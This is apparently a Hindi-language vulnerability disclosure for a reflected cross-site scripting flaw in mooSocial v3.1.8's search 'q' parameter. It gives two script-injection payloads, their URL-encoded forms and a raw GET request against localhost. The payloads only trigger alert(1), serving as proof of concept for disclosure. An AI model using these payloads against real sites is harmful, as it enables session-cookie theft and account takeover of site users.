
mooSocial v3.1.8 सर्च फंक्शन पर क्रॉस-साइट स्क्रिप्टिंग के लिए संवेदनशील है।
mooSocial v3.1.8 के खोज फ़ंक्शन के q पैरामीटर में एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी मौजूद है, जो हमलावरों को एक क्राफ्टेड URL के माध्यम से उपयोगकर्ता के सत्र कुकीज़ चुराने और उनके खाते का धोखा देने की अनुमति देती है।
कमजोर पैरामीटर: q
Payload : test"><script>alert(1)</script>test
FINAL Payload (URL encoded) : test%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest
GET अनुरोध [http://localhost/moosocial/search/index/q=] :
GET /moosocial/search/index/?q=test%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/moosocial/user_info/index/messages
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

Payload : test</title><script>alert(1)</script>test
FINAL Payload (URL encoded) : test%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3etest